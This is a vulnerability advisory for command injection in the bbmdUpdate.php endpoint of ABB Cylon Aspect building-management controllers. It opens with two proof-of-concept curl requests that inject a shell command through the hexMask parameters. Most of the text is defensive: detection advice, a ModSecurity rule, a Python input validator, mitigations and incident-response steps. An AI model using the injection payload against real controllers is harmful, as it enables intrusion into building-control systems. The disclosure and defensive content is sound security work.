ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
blind command injection vulnerability. Input passed to several POST parameters
is not properly sanitized when writing files, allowing attackers to execute
arbitrary shell commands on the system. There is also an off-by-one error in
array access that could lead to undefined behavior and potential DoS.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5903
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5903.php
CVE ID: CVE-2024-48839, CVE-2024-6516, CVE-2024-51550
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48839
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl http://192.168.73.31/bbmdUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "rowCount=2&\
> ip1=192.168.1.1&\
> port1=47808&\
> hexMask1=0xFFFF&\
> remove1=0&\
> ip2=192.168.1.2&\
> port2=47809&\
> hexMask2=0xFFFF; sleep 17; #&\
> remove2=0&\
> submit=Submit"
$ curl http://192.168.73.31/bbmdUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "rowCountNAT=2&\
> NATip1=192.168.1.1&\
> NATport1=2222&\
> NAThexMask1=0xFFFF&\
> NATremove1=7&\
> NATip2=192.168.1.2&\
> NATport2=2223&\
> NAThexMask2=0xFFFF; sleep 17; #&\
> NATremove2=0&\
> submit=Submit"

ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) — Authenticated Blind Remote Code Execution
Overview
ABB Cylon ASPECT is a building management and energy control platform used in commercial and industrial buildings. Multiple ASPECT products (NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise and ASPECT-Studio) running firmware up to and including 3.08.02 were found to contain a server-side vulnerability in the bbmdUpdate.php component that can lead to authenticated blind command injection and an off-by-one array access issue that may cause undefined behavior or a denial-of-service (DoS).
Advisory and Identifiers
- Discovery: Gjoko “LiquidWorm” Krstic (@zeroscience)
- Advisory: ZSL-2025-5903 — https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5903.php
- CVE IDs: CVE-2024-48839, CVE-2024-6516, CVE-2024-51550
- Vendor: ABB Ltd. — product page: https://www.global.abb
- Tested platforms: various Linux distributions and PHP versions (see advisory for details)
Technical Summary
The vulnerable endpoint, bbmdUpdate.php, accepts configuration parameters via HTTP POST and persists them by writing files or invoking shell operations. Several POST parameters were passed to file write and/or shell-execution contexts without sufficient sanitization or proper escaping. Because user-supplied data could be interpreted by the shell, authenticated users were able to perform blind command injection (commands executed but output not returned to client). In addition, an off-by-one error in array indexing was identified that could trigger undefined behavior and potentially crash the application.
Root Causes
- Insufficient input validation and improper use of shell-invocation APIs (e.g., building system calls with unsanitized strings).
- Missing parameter sanitization before interpolation into filenames or shell arguments.
- Array indexing logic error introduced an off-by-one condition leading to out-of-bounds access.
Impact
- Authenticated remote attackers can execute arbitrary OS commands with the privileges of the web application (blind RCE).
- Potential service disruption from the off-by-one array access (DoS or instability).
- Compromise could lead to lateral movement inside building management networks and impact safety-critical building functions.
Detection and Hunting
Prioritize detection on management interfaces and look for anomalous request patterns, shell metacharacters, and unusual system activity from the web server account. Useful indicators and techniques include:
- Search web server access logs for requests to /bbmdUpdate.php and unusual POST payloads.
- Look for evidence of application-side commands or scheduled tasks created shortly after requests to bbmdUpdate.php.
- Monitor process spawns from the web server user and unexpected outbound network connections from management hosts.
# Safe check to see if the endpoint is present (non-exploit):
curl -s -I "http://BUILDING_CONTROLLER/bbmdUpdate.php" | head -n 5
Explanation: This example performs a harmless HTTP HEAD request to check for the existence of the bbmdUpdate.php endpoint and returns HTTP headers. It is safe because it does not submit configuration parameters or attempt to exploit the vulnerability.
Defensive Detection Signature Examples
Defensive signatures should look for suspicious characters (e.g., shell metacharacters) in POST parameters known to be used by bbmdUpdate.php combined with the presence of the PHPSESSID cookie or other authentication tokens. Example regular expressions are defensive and can be deployed in IDS/IPS or WAFs:
# Example ModSecurity rule (defensive) — block shell metacharacters in the bbmdUpdate.php row parameters
SecRule REQUEST_URI "@endsWith /bbmdUpdate.php" "id:100001,phase:2,deny,log,msg:'Potential bbmdUpdate.php injection - suspicious characters in parameters',chain"
    SecRule ARGS:/^(NAT)?(ip|port|hexMask|remove)[0-9]+$/ "@rx [;&|`$()]" "t:none"
Explanation: The first rule matches requests whose path ends in /bbmdUpdate.php and carries the disruptive action (deny) together with the chain flag, so it fires only when the chained rule also matches. The chained rule uses a regex variable selector to inspect only the row parameters bbmdUpdate.php reads (ip1, port2, NAThexMask1 and so on; a plain name list such as ^(ip|port|hexMask)$ would never match the numbered names) and looks for common shell metacharacters in their values. ARGS is already URL-decoded by ModSecurity, so an encoded semicolon is still caught. Run the rule in DetectionOnly mode first to confirm it does not block legitimate configuration changes.
Mitigation and Remediation
| Affected Component | Recommended Action |
|---|---|
| Firmware <= 3.08.02 | Upgrade firmware to the vendor-supplied fixed version. If an official patch exists, apply immediately. |
| Network Accessibility | Restrict administrative interfaces to management VLANs and trusted IP ranges. Block access from the public Internet. |
| Authentication | Enforce strong authentication for BMS interfaces, rotate default credentials, and implement multi-factor authentication where supported. |
| Web Application | Deploy a WAF with tailored rules to block shell metacharacters in configuration parameters and monitor POST requests to administrative endpoints. |
| Monitoring | Enable process and network monitoring on controllers; alert on unusual outbound connections or suspicious child processes of web server user. |
Short-Term Compensating Controls
- Isolate vulnerable controllers from general-purpose networks using VLANs and strict firewall rules.
- Apply host-based monitoring and restrict execution permissions for web-server processes.
- Temporarily disable the management web interface if remote access is not required, or place it behind a VPN requiring strong authentication.
Secure Development Recommendations (Vendor Guidance)
- Do not pass unsanitized user input into shell-invoking APIs. Prefer native configuration APIs or use safe libraries that avoid shell interpretation.
- Validate and canonicalize input strictly (whitelisting acceptable IP, port, and mask formats).
- Use prepared file-write functions and avoid concatenating untrusted input into command lines.
- Add bounds-checking and unit tests to prevent off-by-one errors in array handling.
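As an added example (not code from the advisory, ABB or the ASPECT product), the Python checker below applies the strict allow-list recommended above to a bbmdUpdate.php POST body and can equally be run over captured request bodies (WAF audit logs, proxy captures) when hunting as described in the Detection section. Parameter names are taken from the PoC requests; the maximum mask width and the assumption that the handler loops from 1 to rowCount are mine.

```python
import re
from urllib.parse import unquote_plus

# Names the advisory's PoC sends to bbmdUpdate.php: rowCount/rowCountNAT plus
# per-row ipN, portN, hexMaskN, removeN (optionally NAT-prefixed).
ROW_PARAM = re.compile(r"^(NAT)?(ip|port|hexMask|remove)(\d+)$")
HEX_MASK = re.compile(r"^0x[0-9A-Fa-f]{1,8}$")  # assumption: mask is at most 32 bits

def parse_body(body):
    """Split a form body on '&' only, so an injected ';' stays inside its value."""
    params = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params

def valid_value(field, value):
    """Allow-list per field; anything else is rejected before a file write or shell."""
    if field == "ip":
        return value.count(".") == 3 and all(p.isdigit() and int(p) < 256 for p in value.split("."))
    if field == "port":
        return value.isdigit() and 1 <= int(value) <= 65535
    if field == "hexMask":
        return HEX_MASK.fullmatch(value) is not None
    return value.isdigit()  # remove flag: digits only

def check_body(body):
    """Return findings for one bbmdUpdate.php POST body; [] means it is clean."""
    params = parse_body(body)
    findings, rows = [], {"": set(), "NAT": set()}
    for name, values in params.items():
        m = ROW_PARAM.match(name)
        if not m:
            continue
        prefix, field, idx = m.group(1) or "", m.group(2), int(m.group(3))
        rows[prefix].add(idx)
        findings += [f"{name}: rejected value {v!r}" for v in values if not valid_value(field, v)]
    # Declared row count must equal the rows actually present (1..N); a loop that
    # trusts rowCount alone is where an off-by-one hides (assumption about the handler).
    for prefix, key in (("", "rowCount"), ("NAT", "rowCountNAT")):
        declared = params.get(key, [""])[0]
        expected = set(range(1, int(declared) + 1)) if declared.isdigit() else set()
        if rows[prefix] and expected != rows[prefix]:
            findings.append(f"{key}: declared {declared!r} but rows present {sorted(rows[prefix])}")
    return findings

# Constructed sample mirroring the advisory's PoC payload (not captured traffic).
SAMPLE_BODY = ("rowCount=2&ip1=192.168.1.1&port1=47808&hexMask1=0xFFFF&remove1=0&ip2=192.168.1.2"
               "&port2=47809&hexMask2=0xFFFF; sleep 17; #&remove2=0&submit=Submit")
```

Calling check_body(SAMPLE_BODY) flags only hexMask2, while a well-formed body returns an empty list; a mismatched rowCount is reported separately.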
Incident Response Considerations
- If compromise is suspected, isolate the device from the network and collect volatile artifacts (web server logs, process lists, crontab/task schedules).
- Preserve a forensic image prior to remediation when possible, and follow legal and regulatory requirements for critical infrastructure devices.
- After remediation, perform an integrity review and verify configuration did not contain backdoors or additional persistence mechanisms.
References
- Zeroscience advisory: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5903.php
- CVE: https://www.cve.org/CVERecord?id=CVE-2024-48839
- Vendor resources: check ABB support and firmware download portals for official bulletins and patches.